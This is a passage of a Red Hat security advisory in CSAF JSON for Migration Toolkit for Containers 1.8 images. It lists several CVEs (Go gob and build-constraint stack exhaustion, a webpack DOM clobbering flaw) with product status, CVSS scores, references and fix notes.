"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:10906"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "encoding/gob: golang: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion"
},
{
"cve": "CVE-2024-34158",
"cwe": {
"id": "CWE-1325",
"name": "Improperly Controlled Sequential Memory Allocation"
},
"discovery_date": "2024-09-06T21:20:12.126400+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2310529"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the go/build/constraint package of the Golang standard library. Calling Parse on a \"// +build\" build tag line with deeply nested expressions can cause a panic due to stack exhaustion.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "go/build/constraint: golang: Calling Parse on a \"// +build\" build tag line with deeply nested expressions can cause a panic due to stack exhaustion",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
],
"known_not_affected": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-34158"
},
{
"category": "external",
"summary": "RHBZ#2310529",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310529"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-34158",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34158"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-34158",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34158"
},
{
"category": "external",
"summary": "https://go.dev/cl/611240",
"url": "https://go.dev/cl/611240"
},
{
"category": "external",
"summary": "https://go.dev/issue/69141",
"url": "https://go.dev/issue/69141"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk",
"url": "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2024-3107",
"url": "https://pkg.go.dev/vuln/GO-2024-3107"
}
],
"release_date": "2024-09-06T21:15:12.083000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-12-10T01:37:19+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:10906"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "go/build/constraint: golang: Calling Parse on a \"// +build\" build tag line with deeply nested expressions can cause a panic due to stack exhaustion"
},
{
"cve": "CVE-2024-43788",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-08-27T17:20:06.890123+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2308193"
}
],
"notes": [
{
"category": "description",
"text": "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64"
],
"known_not_affected": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43788"
},
{
"category": "external",
"summary": "RHBZ#2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43788",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43788"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61",
"url": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986",
"url": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986"
},
{
"category": "external",
"summary": "https://research.securitum.com/xss-in-amp4email-dom-clobbering",
"url": "https://research.securitum.com/xss-in-amp4email-dom-clobbering"
},
{
"category": "external",
"summary": "https://scnps.co/papers/sp23_domclob.pdf",
"url": "https://scnps.co/papers/sp23_domclob.pdf"
}
],
"release_date": "2024-08-27T17:15:07.967000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-12-10T01:37:19+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:10906"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule"
},
{
"cve": "CVE-2024-43796",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:28.106254+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
